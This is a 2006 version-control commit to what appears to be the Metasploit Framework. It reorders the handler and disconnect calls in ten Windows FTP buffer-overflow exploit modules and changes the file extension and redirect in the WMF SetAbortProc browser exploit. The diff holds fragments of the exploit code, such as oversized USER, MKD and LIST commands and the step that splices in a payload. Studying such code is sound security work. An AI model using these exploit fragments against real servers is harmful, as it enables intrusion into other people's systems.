Fixed handler/disconnect order in FTP, fixes to metafile

git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-01-08 14:27:59 +00:00
parent e4556d2688
commit 3783e27fc7
11 changed files with 15 additions and 17 deletions

View File

@ -65,13 +65,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
def on_request_uri(cli, request) def on_request_uri(cli, request)
ext = 'emf' ext = 'tiff'
if (not request.uri.match(/\.emf$/i)) if (not request.uri.match(/\.tiff$/i))
html = html =
"<html><meta http-equiv='refresh' content='0;" + "<html><meta http-equiv='refresh' content='0; URL=" +
get_resource + '/' + get_resource + '/' +
Rex::Text.rand_text_alphanumeric(rand(256)+16) + Rex::Text.rand_text_alphanumeric(rand(80)+16) +
".#{ext}'><body>One second please...</body></html>" ".#{ext}'><body>One second please...</body></html>"
send_response(cli, html) send_response(cli, html)
return return

View File

@ -87,8 +87,8 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
send_cmd( ['USER', buf] , false ) send_cmd( ['USER', buf] , false )
disconnect
handler handler
disconnect
end end
end end

View File

@ -83,9 +83,8 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
send_cmd( ['USER', buf] , false) send_cmd( ['USER', buf] , false)
disconnect
handler handler
disconnect
end end
end end

View File

@ -55,8 +55,8 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
send_cmd( [buf] ) send_cmd( [buf] )
disconnect
handler handler
disconnect
end end
end end

View File

@ -102,9 +102,8 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
send_cmd( ["USER #{buf}"] ) send_cmd( ["USER #{buf}"] )
send_cmd( ['HELP'] ) send_cmd( ['HELP'] )
disconnect
handler handler
disconnect
end end
end end

View File

@ -75,8 +75,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
send_cmd( ['USER', usr], true ) send_cmd( ['USER', usr], true )
send_cmd( ['PASS', buf], false ) send_cmd( ['PASS', buf], false )
disconnect
handler handler
disconnect
end end
end end

View File

@ -74,8 +74,8 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
send_cmd( ['UNLOCK', '/', buf] , false ) send_cmd( ['UNLOCK', '/', buf] , false )
disconnect
handler handler
disconnect
end end
end end

View File

@ -176,8 +176,8 @@ class Exploits::Windows::Ftp::ServUMDTMOverflow < Msf::Exploit::Remote
send_cmd( [buf], false ) send_cmd( [buf], false )
disconnect
handler handler
disconnect
end end
def double_ff? def double_ff?

View File

@ -60,8 +60,8 @@ class Exploits::Windows::Ftp::SlimFTPdListConcatOverflow < Msf::Exploit::Remote
send_cmd( ['CWD', '41414141'], true ); send_cmd( ['CWD', '41414141'], true );
send_cmd( ['LIST', buf], false ) send_cmd( ['LIST', buf], false )
disconnect
handler handler
disconnect
end end
end end

View File

@ -74,9 +74,9 @@ class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
send_cmd( ['USER', buf] , false ) send_cmd( ['USER', buf] , false )
disconnect
handler handler
disconnect
end end
end end

View File

@ -69,9 +69,9 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
buf[524, payload.encoded.length] = payload.encoded buf[524, payload.encoded.length] = payload.encoded
send_cmd( ['MKD', buf], true ); send_cmd( ['MKD', buf], true );
handler
disconnect disconnect
handler
end end
end end